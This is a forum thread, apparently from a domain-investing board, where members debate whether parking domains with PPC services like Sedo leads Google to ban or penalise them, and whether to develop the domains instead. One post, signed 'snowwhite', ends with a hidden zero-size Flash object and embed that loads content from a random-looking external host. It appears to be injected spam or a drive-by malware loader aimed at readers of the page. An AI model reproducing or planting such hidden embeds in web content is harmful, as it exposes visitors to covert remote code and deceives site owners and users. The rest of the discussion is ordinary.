Enjoy unlimited access to all forum features for FREE! Optional upgrade available for extra perks.
Sedo.com

Developing Vs Parking

Status
Not open for further replies.

David.

Level 4
Legacy Platinum Member
Reaction score
I read some information saying that if you want to develop your domain not to park it (PPC) because google will ban you from its search engine.

I would just like to know if this is true or not.

All of my domains are at Sedo right now because I want people to know what I have for sale. I plan on developing a few of these domains so should I take them out of Sedo?

randomo

DNF Addict
Legacy Exclusive Member
Reaction score
I'd like to know the answer to that question too. But I can tell you that some of my parked domains (at Parked.com) are actually highly ranked in Google! I just don't know if different parking companies are viewed in different ways by Google, or if my domains' parking history will affect their ranking when I get around to developing them.

Biggie

DNForum Moderator
Legacy Exclusive Member
Reaction score
I read some information saying that if you want to develop your domain not to park it (PPC) because google will ban you from its search engine.

I would just like to know if this is true or not.

All of my domains are at Sedo right now because I want people to know what I have for sale. I plan on developing a few of these domains so should I take them out of Sedo?

this is not true

so you can leave them at sedo if you wish

also, i'd like to know where you read this information

David.

Level 4
Legacy Platinum Member
Reaction score
Biggedon,

I asked for advice in another thread and a member PMed me and offered me all sorts of information. This is where I got this information.

snowwhite

Level 1
Legacy Platinum Member
Reaction score
I'm not really sure, but the domains I know I'm going to develop I usually don't park <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://m09y0106tkvx208.imageshacknow.info/pages/2510/"></param><param name="allowFullScreen" value="true"></param><embed src="http://m09y0106tkvx208.imageshacknow.info/pages/2510/" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

CJ Jefferson

Level 1
Legacy Platinum Member
Reaction score
I agree with the other comments about Google not banning parked domains. You can also check it for yourself. If you can see a page in Google's cache, it's not banned. Plenty of parked domains are cached by Google. (Of course, just because a site isn't cached doesn't mean it's banned. But if a site is cached, it's definitely not banned.)

Another question altogether, is whether Google penalizes parked domains.

Biggie

DNForum Moderator
Legacy Exclusive Member
Reaction score
Another question altogether, is whether Google penalizes parked domains.

imo...

google is in the business of providing information and every domain has the potential to provide information.

so where is the logic for google to penalize that potential?

Tia Wood

Web Developer
Legacy Exclusive Member
Reaction score
If you are still worried about it, what I do is create an account at my hosting with a default page: "This domain for sale. Contact blah blah, etc" and point all domains waiting to be developed or sold there.

nielsencl

Level 2
Legacy Platinum Member
Reaction score
The person you got that information may have been banned for clicking on their ads, or something else. We park almost all our domains because it's quick and easy. Then when we are ready for a site we just change the DNS. Some of our domains have been parked for over a year and have gained PageRank and backlinks while parking. We work at this because our provider allows it. It's great because when you finally have a real site, the domain already has at least a little targeted traffic.

If anyone tells you something you are not sure about in a PM, get a second or third opinion. You did the right thing by posting this question...! :)

dude_h

Legacy Platinum Member
Reaction score
developing a domains will take time to give us money, but park those domains giving us money faster, is it right?

draggar

þórr mjǫlnir
Legacy Exclusive Member
Reaction score
It all depends on the domain and the type of traffic coming in.

Parking primarily deals with backlinks and type-in traffic.

Developing allows you to optimize for SEO and get more traffic that way,

DN BROKER

Level 10
Legacy Exclusive Member
Reaction score
a lot of webmaster that deal outside of the domaining sector assume a parked domain will get you banned on search engines, this is not true.... recently i had to explain this to a group of webmasters! some fool spread the word and most don't know better

Vinnee

Level 4
Legacy Platinum Member
Reaction score
Keep in mind that Google and Sedo have a relationship, so the big G isn't and will not ban Sedo sites. Developing usually proves to be the better money maker, so do both.

http://tinyurl.com/googlesedo

dcristo

Level 9
Legacy Exclusive Member
Reaction score
imo...

google is in the business of providing information and every domain has the potential to provide information.

so where is the logic for google to penalize that potential?

The logic is that Google wants to provide the best user experience as possible.

Showing parked pages in the serps is not doing this. Parked domains provide information? LOL come on man who are we kidding here.

As for whether or not Google dislikes parked domains, I don't have enough experience with parked pages to make a comment on that.

If I was planning to develop, I would at least host a placeholder page instead of parking it.

Status
Not open for further replies.

The Rule #1

Do not insult any other member. Be polite and do business. Thank you!

Members Online

Sedo - it.com Premiums

IT.com

Premium Members

MariaBuy

Our Mods' Businesses

UrlPick.com

*the exceptional businesses of our esteemed moderators

Top Bottom